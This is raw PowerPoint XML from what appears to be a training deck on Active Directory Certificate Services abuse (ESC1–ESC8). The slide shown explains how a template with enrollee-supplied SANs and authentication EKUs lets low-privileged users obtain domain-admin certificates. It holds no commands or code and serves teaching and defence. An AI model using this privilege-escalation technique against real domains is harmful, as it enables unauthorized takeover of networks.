              <a:rPr lang="en-US" dirty="0"/>
              <a:t>setting requires any CSR to be signed by an existing authorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>certificate.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Having </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>certificate enrollment rights allows a low-privileged attacker to request and obtain a certificate based on the template. Enrollment Rights are granted via the certificate template AD object's security descriptor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>certificate template defines EKUs that enable authentication.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Applicable EKUs include Client Authentication (OID 1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (OID 1.3.6.1.5.2.3.4), or Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The certificate template allows requesters to specify a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>subjectAltName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> (SAN) in the CSR.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>If a requester can specify the SAN in a CSR, the requester can request a certificate as anyone (e.g., a domain admin user). The certificate template's AD object specifies if the requester can specify the SAN in its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>mspki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>-certificate-name-flag property. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>mspki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>-certificate-name-flag property is a bitmask and if the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is present, a requester can specify the SAN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TL;DR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>This situation means that a unprivileged users can request a certificate that can be used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>domain authentication, where they can specify an arbitrary alternative name (like a domain admin). This can result in a working certificate for an elevated user like a domain admin!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1445203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Personalizado 1">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FFFFFF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FFFFFF"/>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6322</TotalTime>
  <Words>1662</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personalizado</PresentationFormat>
  <Paragraphs>127</Paragraphs>
  <Slides>25</Slides>
  <Notes>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25</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="31" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Ion</vt:lpstr>
      <vt:lpstr>Active Directory Certificate Abuse</vt:lpstr>
      <vt:lpstr>Syllabus</vt:lpstr>
      <vt:lpstr>Active Directory Certification Services</vt:lpstr>
      <vt:lpstr>Active Directory Certification Services</vt:lpstr>
      <vt:lpstr>Why care? </vt:lpstr>
      <vt:lpstr>Certificate Templates</vt:lpstr>
      <vt:lpstr>Certificate Templates</vt:lpstr>
      <vt:lpstr>Abusing Active Directory  Certification Services</vt:lpstr>
      <vt:lpstr>ESC1 Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN)</vt:lpstr>
      <vt:lpstr>ESC1 - Abuse</vt:lpstr>
      <vt:lpstr>ESC2  Certificate template can be used for any purpose </vt:lpstr>
      <vt:lpstr>ESC3  Misconfigured Enrollment  Agent Templates </vt:lpstr>
      <vt:lpstr>ESC3 - Abuse</vt:lpstr>
      <vt:lpstr>ESC4   Vulnerable Certificate Template Access Control</vt:lpstr>
      <vt:lpstr>ESC4 - Abuse</vt:lpstr>
      <vt:lpstr>ESC5  Vulnerable PKI Object Access Control</vt:lpstr>
      <vt:lpstr>ESC6  CA has EDIT_ATTRIBUTESUBJECTALTNAME2 flag set</vt:lpstr>
      <vt:lpstr>ESC6 - Abuse</vt:lpstr>
      <vt:lpstr>ESC7  Vulnerable Certificate  Authority Access Control</vt:lpstr>
      <vt:lpstr>ECS7 - Abuse</vt:lpstr>
      <vt:lpstr>ESC8   NTLM Relay to AD CS HTTP Endpoints</vt:lpstr>
      <vt:lpstr>ECS8 - Abuse</vt:lpstr>
      <vt:lpstr>Events</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Thanks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Active Directory Fundamentals</dc:title>
  <dc:creator>Ray</dc:creator>
  <cp:lastModifiedBy>Ray</cp:lastModifiedBy>
  <cp:revision>98</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-13T18:45:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-09T15:21:05Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>